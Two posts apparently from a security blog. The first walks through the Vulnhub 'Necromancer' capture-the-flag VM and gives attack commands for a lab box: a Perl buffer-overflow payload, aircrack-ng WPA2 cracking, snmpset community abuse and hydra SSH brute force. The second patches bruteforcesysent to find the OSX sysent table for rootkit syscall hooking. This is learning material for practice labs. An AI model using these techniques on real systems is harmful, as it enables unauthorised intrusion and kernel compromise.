Necromancer by @Xerubus

A few weeks ago i aimed to try and complete more CTF’s in my spare time as they are both beneficial to my learning and theres nothing more rewarding than completing one from start to finish. This lead me to well known where i had completed a few previous CTF’s however none were as difficult or interesting as this one.

So, as a brief introduction – Necromancer has 11 flags  ‘the end goal is simple… destroy The Necromancer!’. With this i loaded up the .ova into VirtualBox and began.


I always find the start of these challenges the most difficult as i havent spent much time tweaking nmap commands and performing network reconnaissance. I also manage to always get confused and stumped as i always think the box has an issue when it probably doesnt… none the less, i began with some  very primitive nmap TCP scans and couldnt even get a response from the box.
I also tried pinging – no result.
Tried primitive UDP scans – no results.

And already, i was stumped however i remembered that UDP scans are often difficult as the UDP protocol works differently and does not have the strict SYN ACK process. (being connectionless) Therefore i tweaked my switches and ran:
 nmap -sU -n -r -T3 -p1-1000 host

This revealed UDP port 666:
666/udp open  doom

With netcat, i initiated a UDP connection to that port using

nc – u host 666

Once connected, i was provided with taunting message:

 You gasp for air! Time is running out!

After feeding it multiple words such as ‘air’ and ‘Time’ just to test, i ran out of time and was disconnected. Confused, i went through the usual process and opened Wireshark to look for any odd network traffic from the host using the filter– ip.addr == host.

While collecting & observing traffic from that host i noticed that it attempts to make a reverse connection on port 4444, so why not listen  and see if i can catch that connection..

nc -lvp 4444 inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 17898

looks like base64…
After putting that blob into a decoder the result was interesting:


You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”


u666 immediately triggered the thought UDP port 666 so, I connected back to udp 666 and fed it the ‘chant’, however seemed to time out… so i reconnected and this time fed it the md5 in the flag. It replied with:

Chant had no affect! Try in a different tongue!

A quick google search revealed the md5 to be – opensesame.

I reconnected and fed it that, it ate it up and spat out this:

A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:


As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.

666 is closed.

Flag 3

‘the numeral 80’ leads me to think that port 80 is now open and – it is.

When first connecting to the webserver a paragraph of green ‘hacker’ text is displayed and a picture of the evil crows that dropped stuff on you.


Based on previous CTF’s off vulnhub, the first thing i did wass download and ‘cat’ the image for any strings however it just returned some terminal destroying DOS like output.

Next, try the webserver so i fired up DIRB to see if there are any common directories. Only result was:
/pics/ – Forbidden

Next, try a couple of nmap scripts.
http-enum revealed nothing.
http-title revealed nothing.

ran a few more automated scanners such as Nikto, but only because i was somewhat stuck.
After a while scratching my head i thought – why not apply the same logic to the second
flag that i have (MD5) and see where that takes me. The Google search didnt return anything on the md5.

Stuck again..

After some research, Turns out binwalk (tool for searching binary image) can be used to extract embedded code inside of files and can also be used for jpegs… so i ran:

binwalk -e thejpegfile.jpeg (extracted)

And funnily enough it extracted some information. So, cd into dir and cat feathers.txt where another base64 encoded string returns this

flag3{9ad3f62db7b91c28b68137000394639f} –
Cross the chasm at /amagicbridgeappearsatthechasm-


The new hint led to this page:


After reading the new page, i read the source and went straight to the image again to try exactly the same method as flag 3, however this did not yield any results.

Stuck again…

Only thing left to do was fuzz the new directory and see if any results can be obtained.
Dirb revealed the file ‘talisman’. After downloading the BIN file i began analysis. Chmod +x to make executable…

when run it gives an interesting result.

 “you have found a talisman.

The talisman is cold to touch, and has no words or symbols on its surface

do you want to wear the talisman?”

I tried 2 simple options:
option 1 – Yes

“nothing happens”

option 2 – No

“Nothing happens”

maybe pass it a flag?

“Nothing happens”

Seemed interesting that it was an executable file that took user input… Yes – so being the same as every other concious security enthusiast, i fed it an arbitrary string of ridiculous length and, segfault. 🙂

now i was hoping this would be fairly straight forward and wouldnt require too much ROP or tinkering so i began a few preliminary steps.
first step is to figure out length of buffer.

buffer length is 32.

With a few other tests i knew i had to change the return address to
0x8048a37 to call chantToBreakSpell.

So i fired up a few msftools to find out more info. I used Pattern_offset.rb & Pattern_create.rb to find any padding, there was none.

Unforutunately, i did not take any screenshots or document this section very well as it only took me about 10 minutes so i can only provide what i used to overflow and change the return address. For a more detailed description of this flag i would reccommend looking at another one of the walkthroughs on Vulnhub.

For the command, i prefer Perl as its what ive used since learning about overflows. As the machine is little-endian, the address needed to be 37in the correct format – x37x8ax04x08.

perl -e ‘print “A”x32 . “\x37\x8a\x04\x08″‘ | ./talisman

Once the buffer was overflown :p and the return address overwritten, the result was:

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337

Again, i performed a  google search on the MD5, revealing ‘blackmagic’.

The previous flag mentions u31337, based on previous flags i immediately thought of UDP port 31337.

nc -u host 31337


As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until…. silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.




Flag6 was fairly easy seeing as it was already in the directory home page.



Click the hyperlink or navigate to host/thenecromancerwillabsorbyoursoul/necromancer

and binary #2 is presented.


At flag 6 we are presented with a new Binary ‘necromancer’.

After rereading through the 2 parts of the page i realised there is a hint to u161
obviously meaning UDP port 161 so before continuing with analysing the binary
i decided to see what was there…

Couldnt to connect to the port so fired up a UDP scan while i start looking at the

So after about 2 minutes of analysis, it wasnt a binary, instead it looked to be in a bzip2 (block size 900)archive format so i extracted it with binwalk and then tried to make it executable again. yet again it was not in an executable format.

Turns out it was a POSIX tar file. When extracted it revealed a .cap file…
When analyzing he .cap file in wireshark, it revealed multiple ‘community’ SSID authentication & deauth connections along with a 4 way key. I smell WPA….

After analyzing the cap file, it looks to be a WPA2 capture.
With that, i used aircrack-ng & rockyou.txt to crack the password.

Password: death2all

Now with the password i thought to connect to UDP161 now and see what i can do…
Cant seem to connect to UDP161, did an nmap scan and it reveals 161 is the SNMP port.
Never worked with SNMP before so a bit of research is required for this section.

snmpcheck? Starting to get stuck as i have no idea what SNMP does or is.

Truely have no idea what to do… never seen this before
After a long period of being stuck, i realised i was never going to solve this section if i didnt have some guidance seeing as i had never done anything with SNMP and all my google searches were inconclusive. So with some help from ContactLeft’s Walkthrough i used:

smnp-check -t host -c death2call (the community?)

the results are:

So, im thinking that death2allrw is the correct path or community, whatever it is in SNMP
After awhile of being dazed and confused and because i have no idea about SNMP, i decided to use this part as more of a learning section and used ContactLeft’s Walkthrough to provide me with guidance…

snmpset -c death2allrw -v 2c iso. s “Unlocked . death2allrw!”

Unlocked the door and gave me this response.

After flag7, i realised that there are still so many areas of security that i have never even touched on – SNMP being one of them.

Regardless, i have the flag.

flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22

Flag8, Flag9, Flag10

After not knowing anything about how to get flag7, i was concerned i would find myself stuck again however – i had a small hint of t22 (tcp) i.e SSH, so i pushed on…

Confirming that port 22 was open – i did what anyone logical would do and ssh’d to it.

The Flag7 MD5 also revealed – ‘demonslayer’ potentially a username or password…

with only a SSH port open, it makes it difficult to determine what to do, so i tried a bruteforce…

hydra -l demonslayer -V -P rockyou.txt host ssh


Now to see if it actually works..

Im in! and immediately haunted by the banner…

Now that im in, i should look around. In the home directory there is the flag8.txt. *wonders what could be in there*. cat flag8.txt…

You enter the Necromancer’s Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

“You are a fool to follow me here!  Do you not know who I am!”

The necromancer turns to face you.  Dark words fill the air!

“You are damned already my friend.  Now prepare for your own death!”

Defend yourself!  Counter attack the Necromancer’s spells at u777!

With that, i promptly move to counter attack @ UDP 777

UDP 777 isnt open on the host… After some confusion  i ran a netstat -all swhich showed 777 listening – but on localhost. So within the ssh session i connected to 777 on the locahost. On connection i am Greeted with a question:

Where do the Black Robes practice magic of the Greater Path?

Not knowing the answer, i had 3 attempts, after those it closed the connection and kicked me out. Now i cant connect back to the host and i confirmed that the IP hadnt changed.

So, i whipped up an incredbly simple script to see if it was a time based lockout.


while true
echo “attempting to connect…”
ssh demonslayer@host
wait 30

Im sure i dont need to explain that… but it essentially attempts to ssh every 30 seconds.
After a few minutes, i noticed it still wasnt connecting so i turned to a few portscans to see if any changes had occured. No ports seem to be open in either protocol. Seems odd…
After more scans and searches. I found that port 666 UDP was open.. surely the whole instance hasnt been reset. It had.

After this reset, i decided to write up some steps just incase it happened again.

  1.  feed opensesame to port 666
  2. browse to /amagicbridgeappearsatthechasm
  3. download /talisman file
  4. feed blackmagic to port 31337
  5. browse to /thenecromancerwillabsorbyoursoul
  6. download /necromancer file
  7. run snmpset -c death2allrw -v 2c iso. s “Unlocked . death2allrw!”
  8. ssh demonslayer @ host 12345678
  9. nc -u localhost 777

Originally, i thought these questions would be incredibly cryptic and difficult.
So, back to where i began, i was presented with question 1:
Where do the Black Robes practice magic of the Greater Path?

The answer required a quick google search and uncovered – kelewan, a fictional world home to the Tsurani…
As it was correct – i was presented with flag8.


Who did Johann Faust VIII make a deal with?

Originally i uncovered that it was the Devil but ‘(more commonly known as Mephistopheles in Faust literature)’
so i fed it Mephistophel and…


Who is tricked into passing the Ninth Gate?
Revealed ‘Hedge’ was tricked..

With that answer, a block of text was returned… (along with flag10)


A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.



So i exited out of the localhost connection as it wasnt doing anything and resumed to search for the next flag. A tcp scan revealed ssh to be open still which was good, my UDP scan revealed only 161 to still remain open. Increased the port range just incase some were missing..

At this point i sort of had no idea what to do. After being stuck for about an hour – not knowing how to get this last flag i turned to just enumerating commands and realised that it had to be in the home folder. So an ls -al showed me a file named: .smallvile, which was obviously the final piece of the puzzle..

cat .smallvile reveals:


Clearly, ive just been elevated to root privileges. But i still had id=1000, so maybe not.
sudo reveals that User demonslayer may run the following commands on thenecromancer:

(ALL) NOPASSWD: /bin/cat /root/flag11.txt

With that, i run the command sudo /bin/cat /root/flag11.txt




Well, Ive collected all 11 flags so the Necromancer has been destroyed!

Concluding remarks

The Necromancer was by far one of the most entertaining and well written CTF’s on Vulnhub, along with being very beginner friendly. I would highly recommend it to anyone who is starting out with CTF’s.

10/10 for enjoyment
5/10 for difficulty (SNMP section :X)
10/10 would do another…

Thanks for all the good work @xerubus & @vulnhub.

ContactLefts Walkthrough –



Bruteforcesysent ‘Fix’ for Yosemite

In my recent research into BSD/OSX rootkits i discovered an issue with syscall hooks in OSX. This issue came about after apple decided to stop exporting the sysent table (i wonder why) thus making it difficult to hook system calls.

The sysent table within BSD/ the BSD section of the OSX kernel looks like this:

Screen Shot 2016-06-06 at 5.28.28 pm.png

Luckily, gdbinit created a great tool for finding the sysent table address.

The bruteforcesysent tool works for all versions of OSX up to Yosemite where users will run into the error:

[ERROR] Error while opening /dev/kmem. Is /dev/kmem enabled?\n“. 

This error comes from the scripts inability to read and or write to /dev/kmem regardless of whether root permissions are granted. After a bit of digging i discovered that the script in fact attempts to open /dev/kmem in O_RDWR mode which is READ and WRITE mode. This means in order to proceed with execution it needs to have write permissions along with read permissions. This of course is difficult on /dev/kmem as write permissions cannot be granted (or as far as my research went i couldnt get any) meaning the line:

if((fd_kmem = open(/dev/kmem,O_RDWR)) == –1

Will always fail. With some testing and many chmods i discovered that i could grant root, read permissions on /dev/kmem. Thus leading me to think that if the script was able to read kmem it would be able to find the address of sysent. Therefore i changed the line above to read:

if((fd_kmem = open(/dev/kmem,O_RDONLY)) == –1

This solved the issue and allowed me to bruteforce kmem and discover the address of sysent. This tool is incredibly useful for anyone attempting to use the no longer exported table and i want to thank gdbinit for all the hard work he put into releasing this publicly!

Hopefully this helps some people who cant seem to discover get bruteforcesysent to work on Yosemite!

P.S – Im sure someone will be able to get write permissions on kmem as i didnt look into it deeply however i was unable to, feel free to send me an email if you figure out how as i would love to know!

Link to tool & gdbinit’s gihub – (

gdbinit’s website –